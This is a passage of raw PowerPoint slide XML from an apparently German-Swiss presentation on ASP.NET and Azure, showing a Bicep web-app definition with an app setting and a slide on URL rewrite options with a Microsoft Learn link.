                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IncludeScopes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" dirty="0"/>
              <a:t>    … </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Textplatzhalter 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BA38B3F-3091-6EE3-2AE5-3B686EC68BF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Option 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Bicep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Inhaltsplatzhalter 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B9D1ED2-6C2D-D028-E8C3-B566A6B7A792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438887" y="2825791"/>
            <a:ext cx="4430282" cy="3363871"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-CH" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="AF00DB"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>resource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Microsoft.Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/sites@2022'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = {</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err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>webshopName</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>location</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: {    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>siteConfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: {</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err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>appSettings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: [{</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err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CatalogBaseUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/'</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      }]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   …</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rechteck: gefaltete Ecke 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B091A884-396E-0897-3536-B49D42BAC6A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6356591" y="2903220"/>
            <a:ext cx="4566818" cy="3286442"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 10051"/>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de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rechteck: gefaltete Ecke 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74134CC0-B1DD-C6EF-7916-DFB35DDBF030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1107691" y="2903220"/>
            <a:ext cx="4566818" cy="3286442"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 10051"/>
            </a:avLst>
          </a:prstGeom>
          <a:no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de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1057118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3">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5">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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7DC15EE-CA6F-64F9-1812-FBFF954C57D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044516" y="1076635"/>
            <a:ext cx="3930256" cy="3495365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Done!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 17">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nhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F147775A-D969-1E2E-2385-83EE6A441CE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263" t="1" r="2062" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3464110" y="1"/>
            <a:ext cx="8727889" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4147213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0DAE27-6652-5A82-82D3-1C39086DEC36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Rewrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>possibilites</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Textfeld 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EB3A141-8D6D-E0E2-1BC0-4AC4BAC584BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="6103731"/>
            <a:ext cx="6094476" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/azure/application-gateway/rewrite-http-headers-url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Inhaltsplatzhalter 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48F154DF-88DF-7690-CE1B-73E1D7D80E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47763" y="3156510"/>
            <a:ext cx="1263073" cy="1263073"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Grafik 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86EBD409-C46E-6C2A-5AA6-9F4393456F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62250" y="3284611"/>
            <a:ext cx="1061192" cy="1061192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Grafik 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE247DD-44EB-CACB-F4B2-0CD8FA3688F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8201" y="3300522"/>
            <a:ext cx="1045281" cy="1045281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Textfeld 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F6E495B-431F-8385-4491-7BDAAE07579A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059083" y="4372258"/>
            <a:ext cx="914399" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textfeld 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF7C2332-BCE2-1FB3-2DE6-4F66ADEF49B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10335646" y="4378787"/>
            <a:ext cx="914399" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>App</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Textfeld 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8329C641-3082-0F05-DF53-E7727E4EAF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2190841" y="3401174"/>
            <a:ext cx="2358338" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>dot.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>article</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>/123/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Textfeld 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D70CE8F-74E4-21CF-08B9-94067BCC3221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318308" y="3401174"/>
            <a:ext cx="3658374" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>dot.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>article.aspx?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
